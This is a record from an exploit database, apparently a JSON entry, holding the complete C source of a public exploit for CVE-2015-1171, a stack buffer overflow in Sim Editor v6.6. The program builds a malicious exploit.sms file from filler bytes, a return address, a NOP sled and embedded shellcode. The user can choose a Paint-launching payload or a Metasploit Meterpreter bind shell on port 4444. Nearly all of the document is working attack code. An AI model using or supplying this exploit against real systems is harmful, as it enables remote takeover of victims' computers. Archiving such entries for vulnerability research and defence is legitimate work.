"EXPLOITPACK:274685E9B1AAB3DC857CCA19B27A95D9", "href": "", "sourceData": "#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n\n#define SIZE 65536 \n\n/*\n * Title: Sim Editor v6.6 Stack Based Buffer Overflow\n * Version: 6.6\n * Tested on: Windows XP sp2 en, Windows 8 64-bit\n * Date: 16-01-2015\n * Author: Osanda Malith Jayathissa\n * E-Mail: osanda[cat]unseen.is\n * Website: OsandaMalith.wordpress.com\n * CVE: CVE-2015-1171\n 
*/\n\nconst char shell1[] = \"ba516a43ddd9e9d97424f45e33c9b1\" \n \t\t\"3231561503561583eefce2a496ab54\" \n \t\t\"46672c07cf821d15abc70ca9b88abc\"\n \t\t\"42ec3e36263830ff8d1e7f00209ed3\"\n \t\t\"c222622e17855be16ac49c1c849475\"\n \t\t\"6a3709f22e8428d424b45251fa41e9\"\n \t\t\"582bf96612d3712082e25632feadd3\"\n \t\t\"81752c32d8761e7ab749ae77c98e09\"\n \t\t\"68bce46915c73f13c142ddb382f505\"\n \t\t\"454663ce4923e7884db224a36a3fcb\"\n \t\t\"63fb7be8a7a7d891fe0d8eaee0ea6f\"\n \t\t\"0b6b187b2d36777abf4d3e7cbf4d11\"\n \t\t\"158ec6fe620f0dbb9d450fea3500da\"\n \t\t\"ae5bb331ec6530b38d9128b688deee\"\n \t\t\"2be14f9b4b566f8e262bff50d1a58b\"\n \t\t\"92\"; \n\n/* msfpayload windows/meterpreter/bind_tcp EXITFUNC=thread LPORT=4444 R | msfencode -a x86 -t c */\nconst char shell2[] = \"bb3ff8edc8dbc6d97424f45f2bc9b1\"\n\t\t\"4a83effc315f11035f11e2ca04054e\"\n\t\t\"34f5d62fbd10e77dd9515ab2aa3457\"\n\t\t\"39feacec4fd6c345e500ed56cb8ca1\"\n\t\t\"954d70b8c9ad49731caf8e6eeffd47\"\n\t\t\"e44212ecb85e99be2ce77e744cc6d0\"\n\t\t\"0317c8d3c02341cc050f1b67fdfb9a\"\n\t\t\"a1cc04ad8d823a0100db7ba6fbae77\"\n\t\t\"d486a843a65c3d560016e5b2b0fb73\"\n\t\t\"30beb0f01ea347d514dfccd8fa6996\"\n\t\t\"fede324c9f479f23a098479b04d26a\"\n\t\t\"c831b9e23d7342f3290431c1f6bedd\"\n\t\t\"697e18198d55dcb570561c9fb6024c\"\n\t\t\"b71f2b07479ffe87170f5167c8ef01\"\n\t\t\"0f02e07e2f2d2a179e098670e2ad38\"\n\t\t\"dd6b4b50cd3dc3cd2f1adc6a4f4970\"\n\t\t\"22c7c69ef4e8d7b45644705f2d8645\"\n\t\t\"7e3283ee17a5597e55575dab0f97cb\"\n\t\t\"5786c06355ff272ca62a3ce532952b\"\n\t\t\"0ad215ac5cb815c4389845f14635fa\"\n\t\t\"aad2b5ab1f74dd5179b242a9ac42bf\"\n\t\t\"7c89c0c90af908\";\n\nconst char *shells[] = { shell1, shell2 };\nconst char *shell_names[] = { \"MS Paint\", \"Bind Shell\" };\nconst char *shell_info[] = { \"\", \"[*] Connect on port 4444\\n\" };\nconst size_t SHELLS_COUNT = 2;\n\nint menu() {\n size_t shell_type = SHELLS_COUNT;\n puts(\"\\b[?] 
Choose an Option: \");\n size_t i;\n for (i = 0; i < SHELLS_COUNT; i++) printf(\"%d. %s\\n\", i, shell_names[i]);\n scanf(\"%i\", &shell_type);\n\treturn shell_type;\n}\n\nvoid banner() {\n static const char banner[] = \n \" _____ _ _____ _ _ _ \\n\"\n \"| __|_|_____ | __|_| |_| |_ ___ ___ \\n\"\n \"|__ | | | | __| . | | _| . | _|\\n\"\n \"|_____|_|_|_|_| |_____|___|_|_| |___|_|\\n\"\n \"\\n[~] Sim Editor v6.6 Stack Based Buffer Overflow\\n\"\n \"[~] Author: Osanda Malith Jayathissa\\n\"\n \"[~] E-Mail: osanda[cat]unseen.is\\n\"\n \"[~] Website: OsandaMalith.wordpress.com\\n\\n\";\n\n fwrite(banner, sizeof(char), sizeof(banner) , stdout);\n}\n\nvoid patternfill(char *dst, char *pattern, size_t count, size_t dst_size) {\n size_t pattern_len = strlen(pattern);\n count *= pattern_len;\n if (count > dst_size) count = dst_size;\n if (pattern_len > dst_size) pattern_len = dst_size;\n\n size_t i, pI;\n for (i = 0, pI = 0; i < count ; i++, pI++) {\n if (pI == pattern_len) pI = 0;\n dst[i] = pattern[pI];\n }\n}\n\nint main() {\n banner();\n int shell_type = menu();\n if (shell_type >= SHELLS_COUNT) {\n printf(\"[-] Enter a valid input\\n\");\n exit (1);\n }\n\n char *buff = (char*) calloc (SIZE, sizeof(char));\n char *nops = (char*) calloc (SIZE, sizeof(char));\n if (!buff || !nops) exit (1);\n\n patternfill(buff, \"41\", 405, SIZE);\n patternfill(nops, \"90\", 16, SIZE);\n\n char ret[] = \"B3804200\";\n const char* filename = \"exploit.sms\";\n\n FILE *outfile = fopen(filename, \"w\");\n if (!outfile) {\n printf(\"%s\\n\",\"Could not open file\");\n exit (1);\n }\n\n fputs(buff, outfile);\n fputs(ret, outfile);\n fputs(nops, outfile);\n\n fputs(shells[shell_type], outfile);\n printf(\"%s\", shell_info[shell_type]);\n fclose(outfile);\n free(buff);\n printf(\"[+] Successfully to written to: \\\"%s\\\"\\n\", filename); \n return 0;\n}\n/*EOF*/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}